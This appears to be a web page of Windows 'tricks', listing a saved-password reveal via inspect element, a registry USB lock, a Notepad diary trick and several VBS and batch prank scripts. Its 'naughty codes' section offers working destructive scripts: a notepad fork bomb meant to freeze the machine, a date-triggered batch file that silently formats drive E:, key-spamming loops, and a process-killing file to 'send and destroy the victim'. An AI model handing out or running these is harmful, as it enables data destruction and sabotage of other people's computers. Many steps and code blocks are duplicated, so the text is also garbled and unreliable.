1) Reveal saved password on a browser
- Open the page where you want to reveal password
- Right click and select inspect element
- Press Ctrl+F and a search bar will appear at bottom. Search for "input" there.- Search until you find this line
- Right click and select inspect element
- Press Ctrl+F and a search bar will appear at bottom. Search for "input" there.- Search until you find this line
- Double click on "password" and change it to "text". Boom... now you can see the password
2) Disable access to USB ports
- Click on Start.
- Click on Run. If you cannot find RUN, type it in the search box.
- Type "regedit" without quotes. This will launch the Registry Editor.
- Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\usbstor.
- In the work area, double click on Start.
- In the Value Data box, enter 4.
- Click on OK.
- Close Registry Editor and refresh your desktop.
Now your USB ports are disabled hence people can't take out data without your permission
- To re-enable access to your USB ports, enter 3 in the Value Data box in Step 6.
- Click on Run. If you cannot find RUN, type it in the search box.
- Type "regedit" without quotes. This will launch the Registry Editor.
- Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\usbstor.
- In the work area, double click on Start.
- In the Value Data box, enter 4.
- Click on OK.
- Close Registry Editor and refresh your desktop.
Now your USB ports are disabled hence people can't take out data without your permission
- To re-enable access to your USB ports, enter 3 in the Value Data box in Step 6.
3) Create a harmless virus to continuously eject CD/DVD drives
1. Open notepad and copy the code given below:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
2. Save the file with any name you want and the extention .vbs (eg. Virus.vbs)
3. Double click to open the above file and your small virus will continuously eject all your connected Optical drives even if you put them back in, it will pop them out again.
3. Double click to open the above file and your small virus will continuously eject all your connected Optical drives even if you put them back in, it will pop them out again.
P.S- To close the above virus trick, open task manager and close the wscript.exe process.
4) Make your own personal diary
1. Open Notepad and type ".LOG" and press enter.(type LOG in capital letter)
2. Save it and close.
3. Now whenever you open that file current date and time will automatically added before your note.
2. Save it and close.
3. Now whenever you open that file current date and time will automatically added before your note.
5) Make your own keyboard disco
1. Open notepad and copy the code given below:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
2. Save the file with any name you want and the extention .vbs (eg. dance.vbs)
3. Double click to open the above file and your keyboard LED lights will make your own disco.
3. Double click to open the above file and your keyboard LED lights will make your own disco.
P.S- To close the above virus trick, open task manager and close the wscript.exe process.
NAUGHTY CODES (USE AT YOUR OWN RISK):
Endless Notepads
NAUGHTY CODES (USE AT YOUR OWN RISK):
Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*
Code:-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Bomb Virus
Copy Paste The Following
If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit
And Save It As Anything.bat
Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day
Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*
Code:-
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*
Code:-
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Endless Backspace
*This makes it so the backspace key is constantly being pressed*
Code:-
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Tasks Kill
@echo off
start calc
tskill msnmsgr
tskill firefox
tskill iexplore
tskill LimreWire
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
pause
save this as .bat file and send and destroy the victim & k!ll Operat!ng systeM!